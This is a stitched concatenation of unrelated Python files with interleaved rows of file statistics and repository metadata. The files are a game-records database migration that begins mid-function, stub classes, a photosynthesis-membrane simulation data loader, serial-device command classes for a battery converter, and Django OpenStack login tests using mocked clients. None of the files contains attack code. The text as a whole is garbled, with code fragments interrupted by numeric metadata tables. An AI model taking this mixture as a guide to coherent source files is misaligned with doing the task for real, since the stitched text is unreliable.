frames = [line.split("\t") for line in frames_raw.split("\n")]
videos = [line.split("\t") for line in videos_raw.split("\n")]
players = [line.split("\t") for line in players_raw.split("\n")]
for (char_index, (char_frames, char_videos, char_players)) in enumerate(
zip(frames, videos, players)
):
character = (
session.query(Character).filter(Character.position == char_index).one()
)
for (stage_index, (frame_string, video_link, player_string)) in enumerate(
zip(char_frames, char_videos, char_players)
):
stage = session.query(Stage).filter(Stage.position == stage_index).one()
try:
player = get_player_by_name(session=session, name=player_string)
except ValueError:
player = None
if "target" in player_string:
time = None
partial_targets = int(player_string[0])
else:
time = int(frame_string)
partial_targets = None
video_link = video_link if video_link != "N/A" else None
add_record(
session=session,
character=character,
stage=stage,
player=player,
time=time,
partial_targets=partial_targets,
video_link=video_link,
)
try:
add_char_stage_alias(
session=session,
aliased_name="Mr. Game&Watch",
known_name="Mr. Game & Watch",
)
add_char_stage_alias(
session=session, aliased_name="Doc", known_name="Dr. Mario"
)
add_player_alias(session=session, aliased_name="Dr.M", known_name="Dr.M")
except ValueError:
pass
ties_raw = """Luigi 3.21 samthedigital
Samplay
Yoshi 7.21 sockdude1
aMSa
samthedigital
Ganon 4.7 LinksDarkArrows
sockdude1
Jerry3333
chaos6
mudi
demon9
moOonstermunch
Freezard
airr8897
samthedigital
Falco 4.97 Zampa
sockdude1
mudi
moOonstermunch
marth1
U3TY
Hanky Panky
LinksDarkArrows
Mewtwo 4.55 LinksDarkArrows
Jerry3333
samthedigital
Mr. Game&Watch 2.82 Zampa
sockdude1
Dr.M
samthedigital
YL on Zelda 4.73 Jerry3333
Samplay
Doc on Ganon 3.78 Ravenyte
Hawk
Mario on Ganon 3.78 Ravenyte
jenkem66
Fox on Seak 0.26 Zampa
jenkem66
Roy on Ganon 3.63 Ravenyte
djwang88
Mewtwo on Ganon 3.99 LinksDarkArrows
Bobby
Fox on Ganon 3.78 LinksDarkArrows
jenkem66
Roy on Mewtwo 4.95 Samplay
megaqwertification
YL on Pichu 4.13 megaqwertification
Samplay"""
cur_combo = None
for line in ties_raw.split("\n"):
combo, _, player_string = line.split("\t")
if combo and combo != cur_combo:
cur_combo = combo
if " on " in cur_combo:
char_string, stage_string = cur_combo.split(" on ")
else:
char_string = stage_string = cur_combo
character = get_character_by_name(session=session, name=char_string)
stage = get_stage_by_name(session=session, name=stage_string)
player = get_player_by_name(session=session, name=player_string)
record = get_record(session=session, character=character, stage=stage)
# skipping Seak records for now
if not record:
continue
record.players.append(player)
def downgrade():
pass
| 175.008969 | 1,393 | 0.788582 | 6,163 | 39,027 | 4.962031 | 0.202823 | 0.143095 | 0.268304 | 0.321965 | 0.551388 | 0.488244 | 0.078022 | 0.047023 | 0.010693 | 0.010693 | 0 | 0.114757 | 0.07851 | 39,027 | 222 | 1,394 | 175.797297 | 0.735589 | 0.00451 | 0 | 0.168317 | 0 | 0.371287 | 0.918722 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009901 | false | 0.009901 | 0.039604 | 0 | 0.049505 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
67c93adf38f6d5d28a731d8427b567858e9fcbc5 | 240 | py | Python | src/compas_fea/fea/ansys/ansys_file_writer.py | yijiangh/compas_fea | 632542da6a3794f6a82c30131c61a421a10a9aa8 | [
"MIT"
] | null | null | null | src/compas_fea/fea/ansys/ansys_file_writer.py | yijiangh/compas_fea | 632542da6a3794f6a82c30131c61a421a10a9aa8 | [
"MIT"
] | null | null | null | src/compas_fea/fea/ansys/ansys_file_writer.py | yijiangh/compas_fea | 632542da6a3794f6a82c30131c61a421a10a9aa8 | [
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Author(s): Tomas Mendez Echenagucia (github.com/tmsmendez)
class AnsysFileWriter(object):
def __init__():
pass
| 17.142857 | 60 | 0.770833 | 28 | 240 | 5.964286 | 0.75 | 0.179641 | 0.287425 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170833 | 240 | 13 | 61 | 18.461538 | 0.839196 | 0.241667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0.166667 | 0.5 | 0 | 0.833333 | 0.166667 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
e1fb235f2307f4a990da16809f783d3b9c0de1d2 | 10,079 | py | Python | src/grana_model/objectdata.py | fieryWalrus1002/grana_model | 5fb4de5249ce27fce98eaa8bfe2aed0abbcb62a9 | [
"MIT"
] | null | null | null | src/grana_model/objectdata.py | fieryWalrus1002/grana_model | 5fb4de5249ce27fce98eaa8bfe2aed0abbcb62a9 | [
"MIT"
] | null | null | null | src/grana_model/objectdata.py | fieryWalrus1002/grana_model | 5fb4de5249ce27fce98eaa8bfe2aed0abbcb62a9 | [
"MIT"
] | null | null | null | from typing import Any, Iterator
import pandas as pd
import random
from math import pi
import numpy as np
import pickle
import os
class ObjectData:
"""This data structure"""
def __init__(
self,
pos_csv_filename: str,
spawn_seed=0,
res_path: str = "src/grana_model/res/",
):
self.__object_colors_dict = {
"LHCII": (0, 51, 0, 255), # darkest green
"LHCII_monomer": (0, 75, 0, 255), # darkest green
"C2S2M2": (0, 102, 0, 255),
"C2S2M": (0, 153, 0, 255),
"C2S2": (102, 204, 0, 255),
"C2": (128, 255, 0, 255),
"C1": (178, 255, 102, 255), # lightest green
"CP43": (178, 255, 103, 255), # same coordinates as C1, same color
"cytb6f": (51, 153, 255, 255), # light blue
}
self.res_path = res_path
self.type_dict = {
obj_type: self.__generate_object_dict(obj_type)
for obj_type in self.__object_colors_dict.keys()
}
self.pos_list = self.__import_pos_data(
f"{self.res_path}/grana_coordinates/{pos_csv_filename}"
)
self.object_list = self.__generate_object_list(
spawn_seed=spawn_seed,
)
def __generate_object_dict(self, obj_type: str):
obj_dict = {
"obj_type": obj_type,
"shapes_compound": self.__load_compound_shapes(obj_type),
"shapes_simple": self.__load_simple_shapes(obj_type),
# "sprite": image.load(f"{self.res_path}/sprites/{obj_type}.png"),
"sprite": os.path.join(self.res_path, f"sprites/{obj_type}.png"),
"color": self.__object_colors_dict[obj_type],
}
return obj_dict
def __import_pos_data(self, file_path):
"""Imports the (x, y) positions from the csv data file provided in filename"""
imported_csv = pd.read_csv(file_path)
return pd.DataFrame(imported_csv, columns=["x", "y"]).values.tolist()
def __load_simple_shapes(self, obj_type):
with open(f"{self.res_path}shapes/{obj_type}_simple.pickle", "rb") as f:
return pickle.load(f)
def __load_compound_shapes(self, obj_type):
with open(f"{self.res_path}shapes/{obj_type}.pickle", "rb") as f:
return pickle.load(f)
# def generate_secondary_object_list(
# self,
# type_dict: dict[Any, Any],
# spawn_seed=0,
# ) -> Iterator[Any]:
# '''
# Generates a list of dicts, each containing the data needed to create a
# PSII secondary structure, in this format:
# {
# "obj_type": str, # ex. "C2S2M2"
# "pos_xy": list, # [x, y] coordinates
# "angle": float, # angle in radians
# "sprite": ImageData object, a spirte for the object type
# "color": (0,0,0,255) RGBA color tuple
# "shapes_simple": simple shape coordinate list
# "shapes_compound": list of shape coordinate pairs, one for each of the
# various compound shapes that are needed to create the PSII structure
# }
# The list will be an iterator object that you can use the next() function
# on to get the next item
# '''
# obj_list = []
# for num in in zip(pos_list, obj_types):
# obj_entry = {
# "obj_type": obj_type,
# "pos": pos,
# "angle": (2 * pi * random()),
# "sprite": type_dict[obj_type]["sprite"],
# "color": type_dict[obj_type]["color"],
# "shapes_simple": type_dict[obj_type]["shapes_simple"],
# "shapes_compound": type_dict[obj_type]["shapes_compound"],
# }
# obj_list.append(obj_entry)
# return iter(obj_list)
# def convert_shape_csv_to_shape_list(self, obj_dict):
# ''' used to turn csv files into a list of shape lists'''
# return [
# pd.read_csv(file).values.tolist()
# for file in obj_dict["shapes_simple"]
# ]
def __generate_object_list(
self,
spawn_seed=0,
) -> Iterator[Any]:
"""
Generates a list of dicts, each containing the data needed to create a
PSII structure, in this format:
{
"obj_type": str, # ex. "C2S2M2"
"pos_xy": list, # [x, y] coordinates
"angle": float, # angle in radians
"sprite": ImageData object, a spirte for the object type
"color": (0,0,0,255) RGBA color tuple
"shapes_simple": simple shape coordinate list
"shapes_compound": list of shape coordinate pairs, one for each of the
various compound shapes that are needed to create the PSII structure
}
The list will be an iterator object that you can use the next() function
on to get the next item
"""
obj_list = []
structure_types = ["C2S2M2", "C2S2M", "C2S2", "C2", "C1", "CP43"]
structure_p = [0.57, 0.17, 0.12, 0.09, 0.03, 0.02]
if spawn_seed == 0:
rng = np.random.default_rng()
else:
rng = np.random.default_rng(spawn_seed)
obj_types = rng.choice(
structure_types, len(self.pos_list), replace=True, p=structure_p
)
random_pos_list = random.sample(self.pos_list, len(self.pos_list))
print(len(random_pos_list))
for pos, obj_type in zip(random_pos_list, obj_types):
obj_entry = {
"obj_type": obj_type,
"pos": pos,
"angle": (2 * pi * random.random()),
"sprite": self.type_dict[obj_type]["sprite"],
"color": self.type_dict[obj_type]["color"],
"shapes_simple": self.type_dict[obj_type]["shapes_simple"],
"shapes_compound": self.type_dict[obj_type]["shapes_compound"],
}
obj_list.append(obj_entry)
return iter(obj_list)
# def convert_shape_csv_to_shape_list(self, obj_dict):
# ''' used to turn csv files into a list of shape lists'''
# return [
# pd.read_csv(file).values.tolist()
# for file in obj_dict["shapes_simple"]
# ]
class ObjectDataExistingData(ObjectData):
"""This data structure"""
def __init__(self, pos_csv_filename: str, spawn_seed=0):
self.__object_colors_dict = {
"LHCII": (0, 51, 0, 255), # darkest green
"LHCII_monomer": (0, 75, 0, 255), # darkest green
"C2S2M2": (0, 102, 0, 255),
"C2S2M": (0, 153, 0, 255),
"C2S2": (102, 204, 0, 255),
"C2": (128, 255, 0, 255),
"C1": (178, 255, 102, 255), # lightest green
"CP43": (178, 255, 103, 255), # same coordinates as C1, same color
"cytb6f": (51, 153, 255, 255), # light blue
}
self.res_path = "src/grana_model/res/"
self.type_dict = {
obj_type: self.__generate_object_dict(obj_type)
for obj_type in self.__object_colors_dict.keys()
}
self.pos_list = self.__import_pos_data(
f"{self.res_path}/grana_coordinates/{pos_csv_filename}"
)
self.object_list = self.__generate_object_list(
spawn_seed=spawn_seed,
)
def __generate_object_dict(self, obj_type: str):
obj_dict = {
"obj_type": obj_type,
"shapes_compound": self.__load_compound_shapes(obj_type),
"shapes_simple": self.__load_simple_shapes(obj_type),
# "sprite": image.load(f"{self.res_path}/sprites/{obj_type}.png"),
"sprite": os.path.join(self.res_path, f"sprites/{obj_type}.png"),
"color": self.__object_colors_dict[obj_type],
}
return obj_dict
def __import_pos_data(self, file_path):
"""Imports the (x, y) positions from the csv data file provided in filename"""
imported_csv = pd.read_csv(file_path)
return pd.DataFrame(
imported_csv, columns=["type", "x", "y", "angle"]
).values.tolist()
def __load_simple_shapes(self, obj_type):
with open(f"{self.res_path}shapes/{obj_type}_simple.pickle", "rb") as f:
return pickle.load(f)
def __load_compound_shapes(self, obj_type):
with open(f"{self.res_path}shapes/{obj_type}.pickle", "rb") as f:
return pickle.load(f)
def __generate_object_list(
self,
spawn_seed=0,
) -> Iterator[Any]:
"""
Generates a list of dicts, each containing the data needed to create a
PSII structure, in this format:
{
"obj_type": str, # ex. "C2S2M2"
"pos_xy": list, # [x, y] coordinates
"angle": float, # angle in radians
"sprite": ImageData object, a spirte for the object type
"color": (0,0,0,255) RGBA color tuple
"shapes_simple": simple shape coordinate list
"shapes_compound": list of shape coordinate pairs, one for each of the
various compound shapes that are needed to create the PSII structure
}
The list will be an iterator object that you can use the next() function
on to get the next item
"""
obj_list = [
{
"obj_type": obj_type,
"pos": (x, y),
"angle": angle,
"sprite": self.type_dict[obj_type]["sprite"],
"color": self.type_dict[obj_type]["color"],
"shapes_simple": self.type_dict[obj_type]["shapes_simple"],
"shapes_compound": self.type_dict[obj_type]["shapes_compound"],
}
for obj_type, x, y, angle in self.pos_list
]
return iter(obj_list)
# def convert_shape_csv_to_shape_list(self, obj_dict):
# ''' used to turn csv files into a list of shape lists'''
# return [
# pd.read_csv(file).values.tolist()
# for file in obj_dict["shapes_simple"]
# ]
if __name__ == "__main__":
pass
| 37.191882 | 86 | 0.570692 | 1,296 | 10,079 | 4.180556 | 0.131944 | 0.068475 | 0.040605 | 0.03876 | 0.898302 | 0.881506 | 0.876707 | 0.870801 | 0.863234 | 0.863234 | 0 | 0.037367 | 0.309654 | 10,079 | 270 | 87 | 37.32963 | 0.741305 | 0.358468 | 0 | 0.606897 | 0 | 0 | 0.128327 | 0.051918 | 0 | 0 | 0 | 0 | 0 | 1 | 0.082759 | false | 0.006897 | 0.103448 | 0 | 0.268966 | 0.006897 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c027be3dd22e68d1e18e4e6bc09e9a7b1e0e48e9 | 90 | py | Python | faker/providers/user_agent/en_US/__iniut__.py | bdclauser/Faker | b676668214f5f4cf2849eea16d50c835ffba5be9 | [
"MIT"
] | 1 | 2021-01-21T03:44:59.000Z | 2021-01-21T03:44:59.000Z | faker/providers/user_agent/en_US/__iniut__.py | bdclauser/Faker | b676668214f5f4cf2849eea16d50c835ffba5be9 | [
"MIT"
] | null | null | null | faker/providers/user_agent/en_US/__iniut__.py | bdclauser/Faker | b676668214f5f4cf2849eea16d50c835ffba5be9 | [
"MIT"
] | null | null | null | from .. import Provider as UserAgentProvider
class Provider(UserAgentProvider):
pass | 18 | 44 | 0.788889 | 9 | 90 | 7.888889 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155556 | 90 | 5 | 45 | 18 | 0.934211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
c03c0d5ad25e527ddaf3cc171824f0666037ad14 | 33 | py | Python | RoboHashpy/__init__.py | namanko/RoboHash | 64f76f381628160872e2156cf5f0cd8e3c4e1cc2 | [
"MIT"
] | 2 | 2021-11-09T13:41:02.000Z | 2021-11-10T09:19:13.000Z | RoboHashpy/__init__.py | namanko/RoboHash | 64f76f381628160872e2156cf5f0cd8e3c4e1cc2 | [
"MIT"
] | null | null | null | RoboHashpy/__init__.py | namanko/RoboHash | 64f76f381628160872e2156cf5f0cd8e3c4e1cc2 | [
"MIT"
] | null | null | null | from .RoboHashpy import RoboHash
| 16.5 | 32 | 0.848485 | 4 | 33 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c05a21c58ee5e9082d1aa5a90befba64327a20aa | 6,091 | py | Python | drivers/eza2500/command0301.py | jinupygogo/apis-dcdc_batt_comm | 7fc4317df414d1b4a4efea271605a52d6aae950b | [
"Apache-2.0"
] | 3 | 2020-12-01T04:30:12.000Z | 2021-12-28T02:42:44.000Z | drivers/eza2500/command0301.py | jinupygogo/apis-dcdc_batt_comm | 7fc4317df414d1b4a4efea271605a52d6aae950b | [
"Apache-2.0"
] | null | null | null | drivers/eza2500/command0301.py | jinupygogo/apis-dcdc_batt_comm | 7fc4317df414d1b4a4efea271605a52d6aae950b | [
"Apache-2.0"
] | 2 | 2020-12-01T14:07:48.000Z | 2021-02-19T07:10:23.000Z | # -*- coding: utf-8 -*-
from struct import pack, unpack
import os
from essx import essx_debug
from essx.essx_exception import ESSXDeviceException, ESSXValueException, ESSXParameterException, ESSXException
from eza2500 import eza2500_base
from eza2500 import eza2500_util
class Command0301(eza2500_base.EZA2500CommandBase):
""" EZA2500 3-1 """
COMMAND = 24
CMD_LEN = 0
ACK_LEN = 4
NAK_LEN = 2
def __init__(self, device):
super(Command0301, self).__init__(device)
self.response = {}
def pack_senddata(self, ad1, ad2, params = {}):
req = pack("<BBBBB", 0x05 ,self.CMD_LEN ,ad1 ,ad2 ,24) + b"00"
return eza2500_util.replace_check_sum(req)
def send(self, ad1, ad2, params = {}):
send_data = self.pack_senddata(ad1, ad2, params)
essx_debug.log('send')
essx_debug.dump(send_data)
self.device.write(send_data)
return send_data
def recv(self):
essx_debug.log('recv')
recv_data = self._recv()
self.response_raw = recv_data
res = {}
(_sfd, _len, _ad1, _ad2, _cmd) = unpack("BBBBB", recv_data[0:5])
if _cmd == 0x18: #ACK
(_cvb ,_drb ,_chksum) = unpack("<HHH", recv_data[5:])
_cvb = eza2500_util.q_denormalize(_cvb, 14, '48', '32', '62', 'cvb')
_drb = eza2500_util.q_denormalize(_drb, 13, '1', '0', '3.999', 'drb')
res["cvb"] = _cvb
res["drb"] = _drb
res["chksum"] = _chksum
self.response = res
elif _cmd == 0x98: #NAK
(_ercd ,_chksum) = unpack("<HH", recv_data[5:])
res["ercd"] = _ercd
res["chksum"] = _chksum
self.response = res
raise ESSXDeviceException("error: ERCD=%x" % _ercd)
else:
raise ESSXValueException("bad response")
self.response = res
essx_debug.log('recv')
#essx_debug.dump(recv_data)
return recv_data
@classmethod
def unit_test(cls, dev = None, params = None):
from io import BytesIO
class Dummy:
def __init__(self):
_cvb = 47.0
_cvb = int(eza2500_util.q_normalize(_cvb, 14, '48', '32', '62', 'cvb'))
_drb = 1.9995
_drb = int(eza2500_util.q_normalize(_drb, 13, '1', '0', '3.999', 'drb'))
_chksum = 0
data = pack("<BBBBBHHH", 2, Command0301.ACK_LEN, 1, 2, 0x18, _cvb ,_drb ,_chksum)
_chksum = eza2500_util.calc_check_sum(data)
self.reader = BytesIO(data[:-2] + pack('BB', _chksum % 256, _chksum // 256))
def read(self, bytes):
return self.reader.read(bytes)
def write(self, data):
essx_debug.dump(data)
if dev == None:
dev = Dummy()
cmd = Command0301(dev)
if params == None:
params = {}
cmd.send(1, 2, params)
cmd.recv()
class Command0304(eza2500_base.EZA2500CommandBase):
""" EZA2500 3-4 """
COMMAND = 24
CMD_LEN = 4
ACK_LEN = 4
NAK_LEN = 2
def __init__(self, device):
super(Command0304, self).__init__(device)
self.response = {}
def pack_senddata(self, ad1, ad2, params = {}):
if 'cvb' in params:
_cvb = params['cvb']
else:
raise ESSXParameterException('no parameter: cvb')
if 'drb' in params:
_drb = params['drb']
else:
raise ESSXParameterException('no parameter: drb')
_cvb = int(eza2500_util.q_normalize(_cvb, 14, '48', '32', '62', 'cvb'))
_drb = int(eza2500_util.q_normalize(_drb, 13, '1', '0', '3.999', 'drb'))
req = pack("<BBBBBHH", 0x05 ,self.CMD_LEN ,ad1 ,ad2 ,24 ,_cvb ,_drb) + b"00"
return eza2500_util.replace_check_sum(req)
def send(self, ad1, ad2, params = {}):
send_data = self.pack_senddata(ad1, ad2, params)
essx_debug.log('send')
essx_debug.dump(send_data)
self.device.write(send_data)
return send_data
def recv(self):
essx_debug.log('recv')
recv_data = self._recv()
self.response_raw = recv_data
res = {}
(_sfd, _len, _ad1, _ad2, _cmd) = unpack("BBBBB", recv_data[0:5])
if _cmd == 0x18: #ACK
(_cvb ,_drb ,_chksum) = unpack("<HHH", recv_data[5:])
_cvb = eza2500_util.q_denormalize(_cvb, 14, '48', '32', '62', 'cvb')
_drb = eza2500_util.q_denormalize(_drb, 13, '1', '0', '3.999', 'drb')
res["cvb"] = _cvb
res["drb"] = _drb
res["chksum"] = _chksum
self.response = res
elif _cmd == 0x98: #NAK
(_ercd ,_chksum) = unpack("<HH", recv_data[5:])
res["ercd"] = _ercd
res["chksum"] = _chksum
self.response = res
raise ESSXDeviceException("error: ERCD=%x" % _ercd)
else:
raise ESSXValueException("bad response")
self.response = res
essx_debug.log('recv')
#essx_debug.dump(recv_data)
return recv_data
@classmethod
def unit_test(cls, dev = None, params = None):
from io import BytesIO
class Dummy:
def __init__(self):
_cvb = 47.0
_cvb = int(eza2500_util.q_normalize(_cvb, 14, '48', '32', '62', 'cvb'))
_drb = 1.9995
_drb = int(eza2500_util.q_normalize(_drb, 13, '1', '0', '3.999', 'drb'))
_chksum = 0
data = pack("<BBBBBHHH", 2, Command0304.ACK_LEN, 1, 2, 0x18, _cvb ,_drb ,_chksum)
_chksum = eza2500_util.calc_check_sum(data)
self.reader = BytesIO(data[:-2] + pack('BB', _chksum % 256, _chksum // 256))
def read(self, bytes):
return self.reader.read(bytes)
def write(self, data):
essx_debug.dump(data)
if dev == None:
dev = Dummy()
cmd = Command0304(dev)
if params == None:
params = {}
_cvb = 47.0
params['cvb'] = _cvb
_drb = 1.9995
params['drb'] = _drb
cmd.send(1, 2, params)
cmd.recv()
#単体テストをするにはPYTHONPATHに一つ上のディレクトリを指定すること
if __name__ == "__main__":
import sys
#import serial
import essx
from eza2500_device import EZA2500Device
if len(sys.argv) > 1 and sys.argv[1] == '1':
ser_dev = essx.essx_rs232c.ESSXRS232C('/dev/cuaU1', 115200)
dev = EZA2500Device(dev = ser_dev, timeout = 1)
else:
dev = None
try:
Command0301.unit_test(dev)
except ESSXException as err:
print(err.reason)
raise err
try:
Command0304.unit_test(dev)
except ESSXException as err:
print(err.reason)
raise err
| 29.712195 | 110 | 0.616648 | 823 | 6,091 | 4.306197 | 0.157959 | 0.046558 | 0.03386 | 0.025395 | 0.792325 | 0.735892 | 0.735892 | 0.711061 | 0.711061 | 0.711061 | 0 | 0.079673 | 0.237564 | 6,091 | 204 | 111 | 29.857843 | 0.683463 | 0.026761 | 0 | 0.789474 | 0 | 0 | 0.059252 | 0 | 0 | 0 | 0.005417 | 0 | 0 | 1 | 0.093567 | false | 0 | 0.064327 | 0.011696 | 0.274854 | 0.011696 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c05c37dc984dcc04d7f07c7ece3abf0472f5d6d9 | 7,470 | py | Python | dhc_os_auth/tests/tests.py | dreamhost/dreamhost_openstack_auth | 9134a2ce9bf807ee6b6b0cedc340ff5de3ffc40a | [
"BSD-3-Clause"
] | null | null | null | dhc_os_auth/tests/tests.py | dreamhost/dreamhost_openstack_auth | 9134a2ce9bf807ee6b6b0cedc340ff5de3ffc40a | [
"BSD-3-Clause"
] | null | null | null | dhc_os_auth/tests/tests.py | dreamhost/dreamhost_openstack_auth | 9134a2ce9bf807ee6b6b0cedc340ff5de3ffc40a | [
"BSD-3-Clause"
] | null | null | null | from django import test
from django.conf import settings
from django.core.urlresolvers import reverse
from keystoneclient import exceptions as keystone_exceptions
from keystoneclient.v2_0 import client
import mox
from .data import generate_test_data
class OpenStackAuthTests(test.TestCase):
def setUp(self):
super(OpenStackAuthTests, self).setUp()
self.mox = mox.Mox()
self.data = generate_test_data()
endpoint = settings.OPENSTACK_KEYSTONE_URL
self.keystone_client = client.Client(endpoint=endpoint)
self.keystone_client.service_catalog = self.data.service_catalog
def tearDown(self):
self.mox.UnsetStubs()
self.mox.VerifyAll()
def test_login(self):
tenants = [self.data.tenant_one, self.data.tenant_two]
user = self.data.user
sc = self.data.service_catalog
form_data = {'region': settings.OPENSTACK_KEYSTONE_URL,
'password': user.password,
'username': user.name}
self.mox.StubOutWithMock(client, "Client")
self.mox.StubOutWithMock(self.keystone_client.tenants, "list")
self.mox.StubOutWithMock(self.keystone_client.tokens, "authenticate")
client.Client(auth_url=settings.OPENSTACK_KEYSTONE_URL,
password=user.password,
username=user.name,
tenant_id=None).AndReturn(self.keystone_client)
self.keystone_client.tenants.list().AndReturn(tenants)
self.keystone_client.tokens.authenticate(tenant_id=tenants[1].id,
token=sc.get_token()['id'],
username=user.name) \
.AndReturn(self.data.scoped_token)
self.mox.ReplayAll()
url = reverse('login')
# GET the page to set the test cookie.
response = self.client.get(url, form_data)
self.assertEqual(response.status_code, 200)
# POST to the page to log in.
response = self.client.post(url, form_data)
self.assertRedirects(response, settings.LOGIN_REDIRECT_URL)
def test_no_tenants(self):
user = self.data.user
form_data = {'region': settings.OPENSTACK_KEYSTONE_URL,
'password': user.password,
'username': user.name}
self.mox.StubOutWithMock(client, "Client")
self.mox.StubOutWithMock(self.keystone_client.tenants, "list")
client.Client(auth_url=settings.OPENSTACK_KEYSTONE_URL,
password=user.password,
username=user.name,
tenant_id=None).AndReturn(self.keystone_client)
self.keystone_client.tenants.list().AndReturn([])
self.mox.ReplayAll()
url = reverse('login')
# GET the page to set the test cookie.
response = self.client.get(url, form_data)
self.assertEqual(response.status_code, 200)
# POST to the page to log in.
response = self.client.post(url, form_data)
self.assertTemplateUsed(response, 'auth/login.html')
self.assertContains(response,
'You are not authorized for any projects.')
def test_invalid_credentials(self):
user = self.data.user
form_data = {'region': settings.OPENSTACK_KEYSTONE_URL,
'password': "invalid",
'username': user.name}
self.mox.StubOutWithMock(client, "Client")
exc = keystone_exceptions.Unauthorized(401)
client.Client(auth_url=settings.OPENSTACK_KEYSTONE_URL,
password="invalid",
username=user.name,
tenant_id=None).AndRaise(exc)
self.mox.ReplayAll()
url = reverse('login')
# GET the page to set the test cookie.
response = self.client.get(url, form_data)
self.assertEqual(response.status_code, 200)
# POST to the page to log in.
response = self.client.post(url, form_data)
self.assertTemplateUsed(response, 'auth/login.html')
self.assertContains(response, "Invalid user name or password.")
def test_exception(self):
user = self.data.user
form_data = {'region': settings.OPENSTACK_KEYSTONE_URL,
'password': user.password,
'username': user.name}
self.mox.StubOutWithMock(client, "Client")
exc = keystone_exceptions.ClientException(500)
client.Client(auth_url=settings.OPENSTACK_KEYSTONE_URL,
password=user.password,
username=user.name,
tenant_id=None).AndRaise(exc)
self.mox.ReplayAll()
url = reverse('login')
# GET the page to set the test cookie.
response = self.client.get(url, form_data)
self.assertEqual(response.status_code, 200)
# POST to the page to log in.
response = self.client.post(url, form_data)
self.assertTemplateUsed(response, 'auth/login.html')
self.assertContains(response,
("An error occurred authenticating. Please try "
"again later."))
def test_switch(self):
tenant = self.data.tenant_two
tenants = [self.data.tenant_one, self.data.tenant_two]
user = self.data.user
scoped = self.data.scoped_token
sc = self.data.service_catalog
form_data = {'region': settings.OPENSTACK_KEYSTONE_URL,
'username': user.name,
'password': user.password}
self.mox.StubOutWithMock(client, "Client")
self.mox.StubOutWithMock(self.keystone_client.tenants, "list")
self.mox.StubOutWithMock(self.keystone_client.tokens, "authenticate")
client.Client(auth_url=settings.OPENSTACK_KEYSTONE_URL,
password=user.password,
username=user.name,
tenant_id=None).AndReturn(self.keystone_client)
self.keystone_client.tenants.list().AndReturn(tenants)
self.keystone_client.tokens.authenticate(tenant_id=tenants[1].id,
token=sc.get_token()['id'],
username=user.name) \
.AndReturn(scoped)
client.Client(endpoint=settings.OPENSTACK_KEYSTONE_URL) \
.AndReturn(self.keystone_client)
self.keystone_client.tokens.authenticate(tenant_id=tenant.id,
token=sc.get_token()['id']) \
.AndReturn(scoped)
self.mox.ReplayAll()
url = reverse('login')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
response = self.client.post(url, form_data)
self.assertRedirects(response, settings.LOGIN_REDIRECT_URL)
url = reverse('switch_tenants', args=[tenant.id])
scoped.tenant['id'] = self.data.tenant_two._info
sc.catalog['token']['id'] = self.data.tenant_two.id
form_data['tenant_id'] = tenant.id
response = self.client.get(url, form_data)
self.assertRedirects(response, settings.LOGIN_REDIRECT_URL)
self.assertEqual(self.client.session['tenant_id'],
scoped.tenant['id'])
